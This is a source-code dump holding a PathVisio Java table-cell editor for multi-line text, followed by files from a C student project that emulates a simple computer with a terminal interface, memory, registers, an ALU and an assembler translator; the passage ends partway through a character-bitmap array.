<repo_name>saurabhkumar13/pathvisio<file_sep>/modules/org.pathvisio.gui/src/org/pathvisio/gui/handler/MultiLineTextHandler.java // PathVisio, // a tool for data visualization and analysis using Biological Pathways // Copyright 2006-2011 BiGCaT Bioinformatics // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package org.pathvisio.gui.handler; import org.pathvisio.core.model.PropertyType; import org.pathvisio.core.model.StaticPropertyType; import javax.swing.*; import javax.swing.border.LineBorder; import javax.swing.table.DefaultTableCellRenderer; import javax.swing.table.TableCellEditor; import javax.swing.table.TableCellRenderer; import java.awt.*; /** * This class knows how to handle text with newlines. *.. * @author <NAME> */ public class MultiLineTextHandler extends DefaultCellEditor implements TableCellRenderer, TypeHandler{ private TableCellRenderer cellRenderer = new DefaultTableCellRenderer(); JTextArea textArea; JScrollPane scrollPane; /** * Constructor. * .. */ public MultiLineTextHandler() { super( new JTextField() ); textArea = new JTextArea(); scrollPane = new JScrollPane(); scrollPane.setViewportView( textArea ); editorComponent = scrollPane; } //-- TableCellRenderer methods --// public Component getTableCellEditorComponent(JTable table, Object value, boolean isSelected, int row, int column ) { this.setValue( value ); scrollPane.setBorder( new LineBorder( Color.black ) ); return scrollPane; } public void setValue( Object value ) { textArea.setText( ( value != null ) ? value.toString() : "" ); } public Object getCellEditorValue() { return textArea.getText(); } public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) { return cellRenderer.getTableCellRendererComponent(table, value, isSelected, hasFocus, row, column); } //-- TypeHandler methods --// public PropertyType getType() { return StaticPropertyType.STRING; } public TableCellRenderer getLabelRenderer() { return null; } public TableCellRenderer getValueRenderer() { return this; } public TableCellEditor getValueEditor() { return this; } }
b7efc413ceb8b1774ed653fa745c5f1ecd6eddf7
[ "Java" ]
1
Java
saurabhkumar13/pathvisio
41079afa4e7c5a1d943880d428f8d121cb0f8cfa
5dcff9ea7693d92402a6a0c0542cd813926e4137
refs/heads/master
<file_sep>#include "cmd_handler.h" int READ(int operand)//input in cell { return 0; } int WRITE(int operand)//output from cell { return 0; } int LOAD(int operand)//load in accum from cell { int value = 0; memGet(operand, &value); acc = value; return 0; } int STORE(int operand) { memSet(operand, acc); return 0; } int ADD(int operand) { int tmp; memGet(operand, &tmp); acc += tmp; return 0; } int SUB(int operand) { int tmp; memGet(operand, &tmp); acc -= tmp; return 0; } int DIVIDE(int operand) { int tmp; memGet(operand, &tmp); if(tmp == 0) { regSet(FLAG_DIVIDE, 0x1); return -1; } else { acc /= tmp; } return 0; } int MUL(int operand) { int tmp; memGet(operand, &tmp); acc *= tmp; return 0; } int JUMP(int operand) { inst_cnt = operand; return 0; } int JNEG(int operand) { if(acc < 0x0) inst_cnt = operand; return 0; } int JZ(int operand) { if(acc == 0x0) inst_cnt = operand; return 0; } int HALT(int operand) { regSet(FLAG_INTERRUPT, 0x1); return 0; } int NOT(int operand) { memSet(operand, ~acc); return 0; } int AND(int operand) { int tmp; memGet(operand, &tmp); acc = acc & tmp; return 0; } int OR(int operand) { int tmp; memGet(operand, &tmp); acc = acc | tmp; return 0; } int XOR(int operand) { int tmp; memGet(operand, &tmp); acc = acc ^ tmp; return 0; } int JNS(int operand) { if(acc > 0) inst_cnt = operand; return 0; } int JC(int operand) { if(acc > 0x7f) inst_cnt = operand; return 0; } int JNC(int operand) { if(acc < 0x7f) inst_cnt = operand; return 0; } int JP(int operand) { if(acc % 2 == 0) inst_cnt = operand; return 0; } int JNP(int operand) { if(acc % 2 != 0) inst_cnt = operand; return 0; } int CHL(int operand) { int tmp; memGet(operand, &tmp); acc = tmp << 0x1; return 0; } int SHR(int operand) { int tmp; memGet(operand, &tmp); acc = tmp >> 0x1; return 0; } int RCL(int operand) { int tmp, buf = 0x40; memGet(operand, &tmp); buf = buf & tmp; buf = buf >> 6; tmp = tmp << 1; acc = tmp | buf; return 0; } int RCR(int operand) { int tmp, buf = 0x1; memGet(operand, &tmp); buf = buf & tmp; tmp = tmp >> 1; buf = buf << 6; acc = buf | tmp; return 0; } int NEG(int operand) { return 0; } int SUBC(int operand) { int tmp, tmp1; memGet(operand, &tmp); memGet(acc, &tmp1); acc = tmp - tmp1; return 0; } int LOGLC(int operand) { return 0; } int LOGRC(int operand) { return 0; } int RCCL(int operand) { return 0; } int RCCR(int operand) { return 0; } int MOVA(int operand) { int tmp; memGet(operand, &tmp); memSet(acc, tmp); return 0; } int MOVR(int operand) { int tmp; memGet(acc, &tmp); memSet(operand, tmp); return 0; } int MOVCA(int operand) { return 0; } int MOVCR(int operand) { return 0; } int ADDC(int operand) { int tmp, tmp1; memGet(operand, &tmp); memGet(acc, &tmp1); acc = tmp + tmp1; return 0; }<file_sep>#ifndef MF_H #define MF_H #define RAM_X 2 #define RAM_Y 2 #define ACC_X 64 #define ACC_Y 2 #define INST_CNT_X 64 #define INST_CNT_Y 5 #define OPER_X 64 #define OPER_Y 8 #define FL_X 64 #define FL_Y 11 #define KEY_X 54 #define KEY_Y 14 #define BC_X 2 #define BC_Y 14 #define FD 1 #define HIDE_CURSOR "\E[?25l" #define SHOW_CURSOR "\E[?25h" #include "../big_chars/bc.h" void init_frame(); void init_ram_box(); void init_key_box(); void init_big_char_box(); void init_info_box(); void cursor(char *str); #endif<file_sep>#include <stdio.h> #include "cmp.h" int main() { cursor(HIDE_CURSOR);// start initialization init_frame(); memInit(); regInit(); init_sig_handlers(); set_non_canonical_regime(0x1, 0x0); while(hand_exit) { print_ram(&cur_cell); print_acc(); print_inst_cnt(); print_operation(); print_cur_cell(); print_flags(); key_handler(key); } clear(); //clearing cursor(SHOW_CURSOR); set_non_canonical_regime(0x0, 0x1); return 0; } <file_sep>#include "mt.h" #include <stdio.h> #include <string.h> int clear(void) { write(1, "\E[2J\E[0;0H",strlen("\E[2J\E[0;0H")); return 0; } int term_xy(int x, int y) { char str[20]; int rows, cols; get_screen_size(&rows, &cols); if((x >= 0 && x <= cols) && (y >= 0 && y <= rows)) { if(sprintf(str, "\E[%d;%dH", y, x)) write(1, str, strlen(str)); else return -1; } return 0; } int get_screen_size(int *rows, int *cols) { struct winsize size; if(!ioctl(0, TIOCGWINSZ, &size)) { *rows = size.ws_row; *cols = size.ws_col; return 0; } else return -1; } int fg_color(enum colors color) { char str[20]; if(!sprintf(str, "\E[%dm", (color+30))) return -1; else write(1, str, strlen(str)); return 0; } int bg_color(enum colors color) { char str[20]; if(!sprintf(str, "\E[%dm", (color+40))) return -1; else write(1, str, strlen(str)); return 0; } <file_sep>#include "rk.h" int read_key(enum keys *key) { struct termios def_options; //default options from termios char buf[16]; int readNum; if(tcgetattr(STDIN_FILENO, &def_options) != 0) //tcgetattr(fd, termios *) return -1; readNum = read(STDIN_FILENO, buf, 15); //IN stream if(readNum < 0) return -1; buf[readNum] = '\0'; if(strcmp(buf, "\E[15~") == 0) *key = f5_key; else if(strcmp(buf, "\E[17~") == 0) *key = f6_key; else if(strcmp(buf, "\E[A") == 0) *key = up_key; else if(strcmp(buf, "\E[B") == 0) *key = down_key; else if(strcmp(buf, "\E[C") == 0) *key = right_key; else if(strcmp(buf, "\E[D") == 0) *key = left_key; else if(strcmp(buf, "\n") == 0) *key = enter_key; else if(strcmp(buf, "\E") == 0) *key = esc_key; else if(strcmp(buf, "l") == 0) *key = l_key; else if(strcmp(buf, "r") == 0) *key = r_key; else if(strcmp(buf, "q") == 0) *key = q_key; else if(strcmp(buf, "x") == 0) *key = x_key; else if(strcmp(buf, "s") == 0) *key = s_key; else if(strcmp(buf, "i") == 0) *key = i_key; else if(strcmp(buf, "t") == 0) *key = t_key; else if(strcmp(buf, "d") == 0) *key = d_key; if(tcsetattr(STDIN_FILENO, TCSANOW, &def_options) != 0) //tcsetattr(fd, optional_actions, termios *) return -1; return 0; } int term_save(void) { struct termios options; FILE *save; if(tcgetattr(STDIN_FILENO, &options) != 0) return -1; if((save = fopen("termsettings.con","wb" )) == NULL) return -1; fwrite(&options, sizeof(options), 1, save); fclose(save); return 0; } int term_restore(void) { struct termios options; FILE *data; if((data = fopen("termsettings.con", "rb")) == NULL) return -1; else { if(fread(&options, sizeof(options), 1, data) > 0) { if(tcsetattr(STDIN_FILENO, TCSAFLUSH, &options) != 0) { fclose(data); return -1; } else { fclose(data); return -1; } } fclose(data); } return 0; } int set_term_regime(int regime, int vtime, int vmin, int echo, int sigint) { struct termios options; if(tcgetattr(STDIN_FILENO, &options) != 0) return -1; if(regime == 1) options.c_lflag |= ICANON; else if(regime == 0) options.c_lflag &= ~ICANON; else return -1; if(regime == 0) { options.c_cc[VTIME] = vtime; options.c_cc[VMIN] = vmin; if(echo == 1) options.c_lflag |= ECHO; else if(echo == 0) options.c_lflag &= ~ECHO; else return -1; if(sigint == 1) options.c_lflag |= ISIG; else if(sigint == 0) options.c_lflag &= ~ISIG; else return -1; } if(tcsetattr(STDIN_FILENO, TCSANOW, &options) != 0) return -1; return 0; } <file_sep>#ifndef RK_H #define RK_H #include <unistd.h> #include <termios.h> #include <fcntl.h> #include <stdlib.h> #include <stdio.h> #include <string.h> /*termios struct * tcflag_t c_iflag input mode * tcflag_t c_oflag output mode * tcflag_t c_cflag control mode * tcflag_t c_lflag local mode * cc_t c__cc[NCCS]; control sym *ECHO echo input characters * ICANON enable canonical mode * ISIG when any of the character INTR, QUIT, SUSP or DSUSP are received * VMIN minimum number of characters for noncanonical read * VTIME timeout in deciseconds for noncanonical read */ enum keys { other_key = 0, up_key, down_key, right_key, left_key, enter_key, esc_key, f5_key, f6_key, l_key, r_key, i_key, t_key, s_key, x_key, d_key, q_key }; int read_key(enum keys *key); int term_save(void); int term_restore(void); int set_term_regime(int regime, int vtime, int vmin, int echo, int sigint); #endif<file_sep>#include <stdio.h> #include <string.h> #include "../simple_computer/sc.h" FILE *fl_open(const char *filename) { FILE *input = fopen(filename, "r"); return input; } void translate(FILE *input ,const char *filename) { int flag = 0, i = 0; for(i = 0; !feof(input); i++) { int line, cmd, operand, value; char command[10] = "\0"; if(!fscanf(input, "%d", &line)) { flag = 1; break; } fscanf(input, "%s", command); if(!strcmp(command, "READ")) cmd = 0x10; else if(!strcmp(command, "WRITE")) cmd = 0x11; else if(!strcmp(command, "LOAD")) cmd = 0x20; else if(!strcmp(command, "STORE")) cmd = 0x21; else if(!strcmp(command, "ADD")) cmd = 0x30; else if(!strcmp(command, "SUB")) cmd = 0x31; else if(!strcmp(command, "DIVIDE")) cmd = 0x32; else if(!strcmp(command, "MUL")) cmd = 0x33; else if(!strcmp(command, "JUMP")) cmd = 0x40; else if(!strcmp(command, "JNEG")) cmd = 0x41; else if(!strcmp(command, "JZ")) cmd = 0x42; else if(!strcmp(command, "HALT")) cmd = 0x43; else if(!strcmp(command, "NOT")) cmd = 0x51; else if(!strcmp(command, "AND")) cmd = 0x52; else if(!strcmp(command, "XOR")) cmd = 0x54; else if(!strcmp(command, "JNS")) cmd = 0x55; else if(!strcmp(command, "JC")) cmd = 0x56; else if(!strcmp(command, "JNC")) cmd = 0x57; else if(!strcmp(command, "JP")) cmd = 0x58; else if(!strcmp(command, "JNP")) cmd = 0x59; else if(!strcmp(command, "CHL")) cmd = 0x60; else if(!strcmp(command, "SHR")) cmd = 0x61; else if(!strcmp(command, "RCL")) cmd = 0x62; else if(!strcmp(command, "RCR")) cmd = 0x63; else if(!strcmp(command, "NEG")) cmd = 0x64; else if(!strcmp(command, "ADDC")) cmd = 0x65; else if(!strcmp(command, "SUBC")) cmd = 0x66; else if(!strcmp(command, "LOGLC")) cmd = 0x67; else if(!strcmp(command, "LOGRC")) cmd = 0x68; else if(!strcmp(command, "RCCL")) cmd = 0x69; else if(!strcmp(command, "RCCR")) cmd = 0x70; else if(!strcmp(command, "MOVA")) cmd = 0x71; else if(!strcmp(command, "MOVR")) cmd = 0x72; else if(!strcmp(command, "MOVCA")) cmd = 0x73; else if(!strcmp(command, "MOVCR")) cmd = 0x74; else if(!strcmp(command, "ADDC")) cmd = 0x75; else if(!strcmp(command, "=")) cmd = 0x0; else { flag = 2; break; } if(!fscanf(input, "%x", &operand)) { flag = 3; break; } if(comEnc(cmd, operand, &value)) { flag = 4; break; } memSet(i, value); } if(!flag) memSave(filename); if (flag == 1) fprintf(stderr, "line %d: expected num of line\n", ++i); if (flag == 2) fprintf(stderr, "line %d: wrong command\n", ++i); if (flag == 3) fprintf(stderr, "line %d: wrong operand\n", ++i); if (flag == 4) fprintf(stderr, "line %d: wrong command or operand\n", ++i); } int main(int argc, const char **argv) { if(argc < 3 || argc > 4) { fprintf(stderr, "Incorrect input.sa/output.o file\n"); return -1; } FILE *input = fl_open(argv[1]); if(input == NULL) { fprintf(stderr, "Cannot open file\n"); return -1; } memInit(); translate(input, argv[2]); return 0; }<file_sep>#ifndef CMD_HANDLER_H #define CMD_HANDLER_H #include "../simple_computer/sc.h" #include "../cmp.h" int READ(int operand); int WRITE(int operand); int LOAD(int operand); int STORE(int operand); int ADD(int operand); int SUB(int operand); int DIVIDE(int operand); int MUL(int operand); int JUMP(int operand); int JNEG(int operand); int JZ(int operand); int HALT(int operand); int NOT(int operand); int AND(int operand); int OR(int operand); int XOR(int operand); int JNS(int operand); int JC(int operand); int JNC(int operand); int JP(int operand); int JNP(int operand); int CHL(int operand); int SHR(int operand); int RCL(int operand); int RCR(int operand); int NEG(int operand); int ADDC(int operand); int SUBC(int operand); int LOGLC(int operand); int LOGRC(int operand); int RCCL(int operand); int RCCR(int operand); int MOVA(int operand); int MOVR(int operand); int MOVCA(int operand); int MOVCR(int operand); #endif<file_sep>#ifndef MT_H #define MT_H #include <string.h> #include <unistd.h> #include <sys/ioctl.h> enum colors { BLACK = 0, RED = 1, GREEN = 2, YELLOW = 3, BLUE = 4, PURPLE = 5, LBLUE = 6, WHITE = 7, DEFAULT = 9 }; int clear(void); int term_xy(int x, int y); int get_screen_size(int *rows, int *cols); int fg_color(enum colors color); int bg_color(enum colors color); #endif <file_sep>Course Project Model of Simple Computer on i8086 <file_sep>#ifndef CMP_H #define CMP_H #include "simple_computer/sc.h" #include "main_frame/mf.h" #include "read_keys/rk.h" #include "cpu/alu.h" #include <signal.h> #include <signal.h> #include <sys/time.h> extern int acc, inst_cnt, operation, cur_cell, hand_exit; struct itimerval timer; extern enum keys key; void key_handler(enum keys key); void cell_step(int sig); //for signal void return_hand_manage(int sig);//for signal void print_ram(int *cell); //write cells of memory void print_acc(); void print_inst_cnt(); void print_operation(); void print_flags(); void print_cur_cell(); void init_sig_handlers(); void transform_bchar(char *sym, int *big); int set_non_canonical_regime(int vmin, int echo); extern const char flags[5]; //Overflow, Zero Div, Out of memoory, Interrupt, Incorrected commnand extern char bigchar_0[64]; extern char bigchar_1[64]; extern char bigchar_2[64]; extern char bigchar_3[64]; extern char bigchar_4[64]; extern char bigchar_5[64]; extern char bigchar_6[64]; extern char bigchar_7[64]; extern char bigchar_8[64]; extern char bigchar_9[64]; extern char bigchar_A[64]; extern char bigchar_B[64]; extern char bigchar_C[64]; extern char bigchar_D[64]; extern char bigchar_E[64]; extern char bigchar_F[64]; extern char bigchar_PLUS[64]; extern char *ind[17]; #endif <file_sep>#include "mf.h" void init_frame()//print main frame { clear(); init_ram_box(); init_info_box(); init_big_char_box(); init_key_box(); } void init_ram_box() //window with cells of memory { box(RAM_X, RAM_Y, RAM_X + 61, RAM_Y + 11); term_xy((RAM_X + 60) / 2 - 3, RAM_Y); write(FD, "MEMORY", strlen("MEMORY")); } void init_big_char_box() //window with current cell of memory which { //is storage in instruction counter box(BC_X, BC_Y, BC_X + 51, BC_Y + 11); } void init_key_box() //window with manage keys { box(KEY_X, KEY_Y, KEY_X + 32, KEY_Y + 11); term_xy(KEY_X + 32 / 2 - 9, KEY_Y); write(FD, "KEYS", strlen("KEYS")); term_xy(KEY_X + 1, KEY_Y + 1); write(FD, "L - load", strlen("L - load")); term_xy(KEY_X + 1, KEY_Y + 2); write(FD, "S - save", strlen("S - save")); term_xy(KEY_X + 1, KEY_Y + 3); write(FD, "R - run", strlen("R - run")); term_xy(KEY_X + 1, KEY_Y + 4); write(FD, "T - step", strlen("T - step")); term_xy(KEY_X + 1, KEY_Y + 5); write(FD, "I - reset", strlen("I - reset")); term_xy(KEY_X + 1, KEY_Y + 6); write(FD, "F5 - accumulator", strlen("F5 - accumulator")); term_xy(KEY_X + 1, KEY_Y + 7); write(FD, "F6 - instruction counter", strlen("F6 - instruction counter")); } void init_info_box() //window with current statuses of { //accumulator, instruction counter, operarion, flags box(ACC_X, ACC_Y, ACC_X + 22, ACC_Y + 2); //accumulator box term_xy(ACC_X + 22 / 2 - 5, ACC_Y); write(FD, "ACCUMULATOR", strlen("ACCUMULATOR")); box(INST_CNT_X, INST_CNT_Y, INST_CNT_X + 22, INST_CNT_Y + 2); //instcounter box term_xy(INST_CNT_X + 22 / 2 - 9, INST_CNT_Y); write(FD, "INSTRUCTIONCOUNTER", strlen("INSTRUCTIONCOUNTER")); box(OPER_X, OPER_Y, OPER_X + 22, OPER_Y + 2); //operatin box term_xy(OPER_X + 22 / 2 - 4, OPER_Y); write(FD, "OPERATION", strlen("OPERATION")); box(FL_X, FL_Y, FL_X + 22, FL_Y + 2); //flags box term_xy(FL_X + 22 / 2 - 2, FL_Y); write(FD, "FLAGS", strlen("FLAGS")); } void cursor(char *str) { write(FD, str, strlen(str)); }<file_sep>#include "bc.h" void printA(char str) { int len = 1 + strlen("\E(0\E(B"); char *_str = (char*)malloc(len * sizeof(char)); sprintf(_str, "\E(0%c\E(B", str); write(1, _str, strlen(_str)); } int box(int x1, int y1, int x2, int y2) { int xmax, ymax; get_screen_size(&ymax, &xmax); if(x1 < 0 || x2 < 0 || y1 < 0 || y2 < 0 || x1 > xmax || x2 > xmax || y1 > ymax || y2 > ymax) return -1; term_xy(x1, y1); printA(BOXCHAR_TL); term_xy(x1,y2); printA(BOXCHAR_BL); term_xy(x2, y1); printA(BOXCHAR_TR); term_xy(x2,y2); printA(BOXCHAR_BR); for(int i = x1 + 1; i < x2; i++) { term_xy(i, y1); printA(BOXCHAR_HOR); term_xy(i, y2); printA(BOXCHAR_HOR); } for(int i = y1 + 1; i < y2; i++) { term_xy(x1,i); printA(BOXCHAR_VERT); term_xy(x2,i); printA(BOXCHAR_VERT); } return 0; } int printchar(int *big, int x, int y, enum colors fg, enum colors bg) { int xmax, ymax, pos, bit; char row[9]; get_screen_size(&ymax, &xmax); if(x < 0 || y < 0 || x + 8 > xmax|| y + 8 > ymax) return -1; row[8] = '\0'; fg_color(fg); bg_color(bg); for(int i = 0; i < 8; i++) { for(int j = 0; j < 8; j++) { pos = i >> 2; bit = (big[pos] >> ((i % 4) * 8 + j)) & 1; if(bit == 0) row[j] = ' '; else row[j] = BOXCHAR_REC; } term_xy(x, y + i); for(int i = 0; i < strlen(row); i++) printA(row[i]); } fg_color(DEFAULT); bg_color(DEFAULT); return 0; } int setcharpos(int *big, int x, int y, int value) { int pos = 0; if((x < 0) || (y < 0) || (x > 7) || (y > 7) || (value > 1) || (value < 0)) return -1; if(y <= 3) pos = 0; else pos = 1; y = y % 4; if(value == 0) big[pos] &= ~(1 << (y * 8 + x)); else big[pos] |= (1 << (y * 8 + x)); return 0; } int getcharpos(int *big, int x, int y, int *value) { int pos = 0; if((x < 0) || (y < 0) || (x > 7) || (y > 7)) return -1; if(y <= 3) pos = 0; else pos = 1; y = y % 4; *value = (big[pos] >> (y * 8)) & 1; return 0; } int charwrite(int fd, int *big, int count) { int err = 0; err = write(fd, &count, sizeof(count)); if (err == -1) return -1; err = write(fd, big, count * sizeof(int) * 2); if (err == -1) return -1; return 0; } int charread(int fd, int *big, int nd_count, int *count) { int n, cnt, err; err = read(fd, &n, sizeof(n)); if ((err == -1) || (err != sizeof(n))) return -1; cnt = read(fd, big, nd_count * sizeof(int) * 2); if (cnt == -1) return -1; *count = cnt / (sizeof(int) * 2); return 0; }<file_sep>#include <stdlib.h> #include <stdio.h> #include "sc.h" int commands[38] = {0x10, 0x11, 0x20, 0x21, 0x30, 0x31, 0x32, 0x33, 0x40, 0x41, 0x42, 0x43, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76 }; int memInit() { free(RAM); RAM = (int*)malloc(memory_size * sizeof(int)); if(RAM == NULL) return -1; for(int i = 0; i < memory_size; i++) RAM[i] = 0x0; return 0; } int memSet(int address, int value) { if(address < memory_size && address >= 0x0) { RAM[address] = value; } else { regSet(FLAG_OUTMEM, 0x1); return -1; } return 0x0; } int memGet(int address, int *value) { if(address < memory_size && address >= 0 && value != NULL) { *value = RAM[address]; return 0; } else { regSet(FLAG_OUTMEM, 1); return -1; } } int memSave(const char *filename) { FILE *MEMORYDUMP; MEMORYDUMP = fopen(filename, "wb"); if(MEMORYDUMP == NULL) return -1; else { if(fwrite(RAM, sizeof(*RAM)* memory_size, 1, MEMORYDUMP)); { fclose(MEMORYDUMP); } } return 0; } int memLoad(const char *filename) { FILE *MEMORYDUMP; MEMORYDUMP = fopen(filename, "rb"); if(MEMORYDUMP == NULL) return -1; else { if(fread(RAM, sizeof(*RAM) * memory_size, 1, MEMORYDUMP)) { for(int i = 0; i < memory_size; i++) RAM[i] &= 0x7FFF; fclose(MEMORYDUMP); } } return 0; } int regInit() { registr_ = 0x0; return 0; } int regSet(int reg, int value) { if((reg > 0) && (reg <= 5)) { if(value == 1) { registr_ = registr_ | (1 << (reg - 1)); } else if(value == 0) registr_ = registr_ & (~(1 << (reg - 1))); else return -1; } else return -1; return 0; } int regGet(int reg, int *value) { if((reg > 0) && (reg <= 5)) { *value = (registr_ >> (reg - 1)) & 1; } else return -1; return 0; } int comEnc(int command, int operand, int *value) { int *comptr; for(int i = 0; i < 38; i++) //count of correct commands if(command == commands[i]) comptr = &commands[i]; if(comptr == NULL) { regSet(FLAG_COMMAND, 1); return -1; } if(comptr != NULL) { if(operand > 0x7F) { operand &= 0x7F; regSet(FLAG_OVERFLOW, 1); } if(value != NULL) { *value = (command << 7) | operand; regSet(FLAG_COMMAND, 0); } } return 0; } int comDec(int value, int *command, int *operand) { int *comptr, attr = (value >> 14) & 1, comtmp, optmp; if(command != NULL && operand != NULL) { if(attr == 0) { comtmp = (value >> 7) & 0x7F; optmp = value & 0x7F; for(int i = 0; i < 38; i++) if(comtmp == commands[i]) comptr = &commands[i]; } if(comptr != NULL) { *command = comtmp; *operand = optmp; } else { regSet(FLAG_COMMAND, 1); return -1; } } return 0; } <file_sep>#ifndef BC_H #define BC_H #include "../my_term/mt.h" #include <unistd.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #define BOXCHAR_REC 'a' #define BOXCHAR_BR 'j' #define BOXCHAR_BL 'm' #define BOXCHAR_TR 'k' #define BOXCHAR_TL 'l' #define BOXCHAR_VERT 'x' #define BOXCHAR_HOR 'q' void printA(char str); int box(int x1, int y1, int x2, int y2); int printchar(int *big, int x, int y, enum colors fg, enum colors bg); int setcharpos(int *big, int x, int y, int value); int getcharpos(int *big, int x, int y, int *value); int charwrite(int fd, int *big, int count); int charread(int fd, int *big, int nd_count, int *count); #endif<file_sep>#ifndef SC_H #define SC_H #define memory_size 100 #define FLAG_OVERFLOW 1 #define FLAG_DIVIDE 2 #define FLAG_OUTMEM 3 #define FLAG_INTERRUPT 4 #define FLAG_COMMAND 5 int *RAM, registr_; int memInit(); int memSet(int address, int value); int memGet(int address, int *value); int memSave(const char *filename); int memLoad(const char *filename); int regInit(void); int regSet(int reg, int value); int regGet(int reg, int *value); int comEnc(int command, int operand, int *value); int comDec(int value, int *command, int *operand); #endif <file_sep>#include "alu.h" int ALU(int command, int operand) { switch(command) { case 0x10: return READ(operand); case 0x11: return WRITE(operand); case 0x20: return LOAD(operand); case 0x21: return STORE(operand); case 0x30: return ADD(operand); case 0x31: return SUB(operand); case 0x32: return DIVIDE(operand); case 0x33: return MUL(operand); case 0x40: return JUMP(operand); case 0x41: return JNEG(operand); case 0x42: return JZ(operand); case 0x43: return HALT(operand); case 0x51: return NOT(operand); case 0x52: return AND(operand); case 0x53: return OR(operand); case 0x54: return XOR(operand); case 0x55: return JNS(operand); case 0x56: return JC(operand); case 0x57: return JNC(operand); case 0x58: return JP(operand); case 0x59: return JNP(operand); case 0x60: return CHL(operand); case 0x61: return SHR(operand); case 0x62: return RCL(operand); case 0x63: return RCR(operand); case 0x64: return NEG(operand); case 0x65: return ADDC(operand); case 0x66: return SUBC(operand); case 0x67: return LOGLC(operand); case 0x68: return LOGRC(operand); case 0x69: return RCCL(operand); case 0x70: return RCCR(operand); case 0x71: return MOVA(operand); case 0x72: return MOVR(operand); case 0x73: return MOVCA(operand); case 0x74: return MOVCR(operand); default: regSet(FLAG_COMMAND, 0x1); return -1; } }<file_sep>#ifndef ALU_H #define ALU_H #include "cmd_handler.h" int ALU(int command, int operand); #endif<file_sep>#include "cmp.h" int acc = 0x0, inst_cnt = 0x0, operation = 0x0, cur_cell = 0x0, hand_exit = 0x1; enum keys key = other_key; const char flags[5] = {'O', 'D', 'M', 'I', 'C'}; char bigchar_0[64] = { 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0 }; char bigchar_1[64] = { 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0 }; char bigchar_2[64] = { 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0 }; char bigchar_3[64] = { 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0 }; char bigchar_4[64] = { 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0 }; char bigchar_5[64] = { 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0 }; char bigchar_6[64] = { 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0 }; char bigchar_7[64] = { 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0 }; char bigchar_8[64] = { 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0 }; char bigchar_9[64] = { 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0 }; char bigchar_A[64] = { 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 